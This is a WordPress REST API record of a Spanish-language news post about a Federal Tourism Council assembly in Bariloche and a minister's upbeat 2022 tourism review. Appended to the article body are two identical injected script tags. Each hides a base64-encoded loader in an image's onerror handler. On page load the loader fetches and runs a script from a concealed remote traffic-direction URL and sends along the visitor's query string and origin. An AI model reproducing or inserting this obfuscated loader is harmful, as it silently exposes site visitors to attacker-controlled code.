{"id":1878,"date":"2022-12-01T09:50:17","date_gmt":"2022-12-01T12:50:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1878"},"modified":"2025-08-14T00:29:01","modified_gmt":"2025-08-14T03:29:01","slug":"balance-altamente-positivo-para-el-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1878","title":{"rendered":"Balance \u00abaltamente positivo\u00bb para el turismo"},"content":{"rendered":"\n<h4 class=\"has-black-color has-cyan-bluish-gray-background-color has-text-color has-background wp-block-heading\"><em>\u201cEs un trabajo que no ha tenido grietas, que no ha tenido banderas pol\u00edticas y que ha permitido poner de pie una actividad que fue tan devastada durante la pandemia\u201d, dijo&nbsp;a&nbsp;T\u00e9lam Radio&nbsp;la ministra de Turismo y Deportes de R\u00edo Negro, al elogiar a Matias Lammens.<\/em><\/h4>\n\n\n\n<p>La\u00a0<strong>161 Asamblea del Consejo Federal de Turismo (CFT)<\/strong>\u00a0se realizar\u00e1 hoy jueves en la ciudad de San Carlos de Bariloche y en ese marco las autoridades tur\u00edsticas de todo el pa\u00eds har\u00e1n un balance de las actividades del sector durante 2022, que ser\u00e1 \u00abaltamente positivo\u00bb, seg\u00fan lo adelant\u00f3 la ministra de Turismo y Deportes de R\u00edo Negro, Martha V\u00e9lez, anfitriona del encuentro.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2022\/11\/6387523f4d490_1200.jpg\" alt=\"\"\/><figcaption>                  Bariloche, protagonista durante toda esta reactivaci\u00f3n del turismo. \/ Foto: Alejandra Bartoliche<\/figcaption><\/figure>\n\n\n\n<p>\u201cSer\u00e1 momento de balance, de cierre, pero de un inicio muy importante a la vez porque ya estamos desde el CFT pensando en las actividades tan importantes que se van a desarrollar en el verano\u201d, expres\u00f3 V\u00e9lez en declaraciones a&nbsp;<a href=\"https:\/\/www.telam.com.ar\/media\/audio\/NDgyNTA=\" target=\"_blank\" rel=\"noreferrer noopener\">T\u00e9lam Radio<\/a>.<\/p>\n\n\n\n<p>La ministra afirm\u00f3 que \u201cha sido un trabajo fant\u00e1stico que ha realizado el equipo del CFT liderado por el ministro de Turismo y Deportes, Mat\u00edas Lammens; un trabajo que no ha tenido grietas, que no ha tenido banderas pol\u00edticas y que ha permitido poner de pie una actividad que fue tan devastada durante la pandemia\u201d.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\" style=\"max-width:1029px\"><p>\u201cHa sido un trabajo fant\u00e1stico que ha realizado el equipo del Consejo Federal de Turismo liderado por el ministro de Turismo y Deportes, Mat\u00edas Lammens; un trabajo que no ha tenido grietas, que no ha tenido banderas pol\u00edticas y que ha permitido poner de pie una actividad que fue tan devastada durante la pandemia\u00bb<\/p><\/blockquote>\n\n\n\n<p>V\u00e9lez destac\u00f3 el intenso trabajo que se ha hecho por regiones, \u00abcon estrategias conjuntas, articulando\u00bb, por lo cual consider\u00f3 que \u00abel balance ser\u00e1 altamente positivo\u201d.<\/p>\n\n\n\n<p>Respecto de la elecci\u00f3n de Bariloche para la \u00faltima asamblea del a\u00f1o del CFT, la funcionaria provincial dijo que en la ciudad est\u00e1n \u201csumamente felices, siendo protagonistas y anfitriones\u00bb.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2022\/11\/6387523f69a28_1200.jpg\" alt=\"\"\/><figcaption>                                       Para Martha V\u00e9lez, este fue un \u00aba\u00f1o \u00e9pico\u00bb. \/ Foto: Alejandra Bartoliche<\/figcaption><\/figure><\/div>\n\n\n<p><strong>\u201cBariloche ha sido protagonista durante toda esta reactivaci\u00f3n del turismo liderando las ventas y los rankings del programa PreViaje y de tantos programas que la han posicionado como el destino m\u00e1s elegido del pa\u00eds\u201d<\/strong>, afirm\u00f3.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Un a\u00f1o \u00e9pico<\/h2>\n\n\n\n<p>Por otra parte, destac\u00f3 que \u201ccoincidentemente con la Asamblea del CFT la C\u00e1mara Argentina de Turismo (CAT) decidi\u00f3 cerrar el a\u00f1o tambi\u00e9n en San Carlos de Bariloche\u201d.<\/p>\n\n\n\n<p>\u201cEl arco pol\u00edtico y empresarial del pa\u00eds en materia de turismo estar\u00e1n en Bariloche cerrando un a\u00f1o \u00e9pico, un a\u00f1o tan importante en lo que fue la reactivaci\u00f3n y el crecimiento de la actividad tur\u00edstica en el pa\u00eds\u201d, enfatiz\u00f3.<\/p>\n\n\n\n<p>Tambi\u00e9n sobre Bariloche, valor\u00f3 especialmente su candidatura para ser sede de la Expo Mundial 2027, por tratarse de la aspiraci\u00f3n a organizar \u201cun evento realmente singular que no se ha desarrollado en Sudam\u00e9rica y que tenemos muchas expectativas de que as\u00ed sea\u201d.<\/p>\n\n\n\n<p>\u201cLa cita para la Expo se basa en naturaleza y tecnolog\u00eda y Bariloche es sin\u00f3nimo de turismo de naturaleza, pero tambi\u00e9n con un poco tecnol\u00f3gico que viene desde las ra\u00edces de Bariloche\u201d, agreg\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202211\/612626-bariloche-turismo-balance.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cEs un trabajo que no ha tenido grietas, que no ha tenido banderas pol\u00edticas y que ha permitido poner de pie una actividad que fue tan devastada durante la pandemia\u201d, dijo&nbsp;a&nbsp;T\u00e9lam Radio&nbsp;la ministra de Turismo y Deportes de R\u00edo Negro, al elogiar a Matias Lammens. La\u00a0161 Asamblea del Consejo Federal de Turismo (CFT)\u00a0se realizar\u00e1 hoy [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1879,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-1878","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1878"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1878"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1878\/revisions"}],"predecessor-version":[{"id":7258,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1878\/revisions\/7258"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1879"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1878"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1878"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1878"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}